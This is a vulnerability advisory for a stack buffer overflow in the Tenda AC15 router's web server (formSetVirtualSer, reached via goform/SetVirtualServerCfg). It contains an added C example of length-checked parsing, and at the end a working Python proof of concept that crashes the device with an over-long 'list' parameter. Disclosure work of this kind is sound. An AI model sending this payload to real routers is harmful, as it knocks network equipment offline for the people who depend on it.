CVE-2022-44169: IoT_vuln/Tenda/AC15/formSetVirtualSer at main · RobinWang825/IoT_vuln
Tenda AC15 V15.03.05.18 is vulnerable to Buffer Overflow via function formSetVirtualSer.
Tenda AC15 (V15.03.05.18) has a Buffer Overflow Vulnerability
Product
- product information: https://www.tenda.com.cn/
- firmware download: https://www.tenda.com.cn/download/detail-2710.html
Affected version
V15.03.05.18
Vulnerability
The stack overflow vulnerability is in /bin/httpd. It occurs in the formSetVirtualSer function, which can be reached through the URL goform/SetVirtualServerCfg.
In formSetVirtualSer, the value the program reads from the list parameter is stored in v5, and v5 is then passed to the sub_76858 function as the second argument.
In sub_76858, sscanf is called to split this string and copy it to a stack buffer without checking its length.
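A bounded alternative to the unchecked sscanf copy described above, as an added example that is not code from the firmware or from the original advisory. The struct, its field sizes, the comma-separated layout, the '~' entry separator and the names parse_rule and parse_list are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Field sizes, the comma-separated layout and the '~' entry separator are
   assumptions for illustration, not taken from the Tenda firmware. */
struct vs_rule { char ip[16], in_port[6], out_port[6], proto[4]; };
#define MAX_ENTRY 40
/* Unsafe pattern (for contrast, not compiled):
     sscanf(entry, "%[^,],%[^,],%[^,],%s", ip, in_port, out_port, proto);
   No field width: sscanf writes as many bytes as the input supplies. */

/* Every conversion is capped at sizeof(field)-1; %n proves the whole entry
   was consumed, so over-long fields are rejected instead of truncated. */
int parse_rule(const char *entry, struct vs_rule *r)
{
    int used = 0;
    memset(r, 0, sizeof *r);
    int n = sscanf(entry, "%15[^,],%5[^,],%5[^,],%3[^,]%n",
                   r->ip, r->in_port, r->out_port, r->proto, &used);
    return (n == 4 && entry[used] == '\0') ? 0 : -1;
}

/* Splits the list on '~' and length-checks each entry before copying it.
   Returns the number of rules parsed, or -1 on any invalid entry. */
int parse_list(const char *list, struct vs_rule *out, int max_rules)
{
    int count = 0;
    while (*list) {
        char entry[MAX_ENTRY];
        size_t len = strcspn(list, "~");
        if (len >= sizeof entry || count >= max_rules)
            return -1;
        memcpy(entry, list, len);
        entry[len] = '\0';
        if (parse_rule(entry, &out[count]) != 0)
            return -1;
        count++;
        list += len;
        if (*list == '~') list++;
    }
    return count;
}

int main(void)
{
    struct vs_rule rules[4];  /* constructed sample input below */
    printf("%d\n", parse_list("192.168.0.100,80,8080,tcp~", rules, 4));
    return 0;
}
```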
PoC
PoC of Denial of Service (DoS)
```python
import requests

# Over-long "list" value (0x400 bytes plus '~') sent to the vulnerable handler
data = {
    b"list": b'A' * 0x400 + b'~'
}
res = requests.post("http://192.168.0.1/goform/SetVirtualServerCfg", data=data)
print(res.content)
```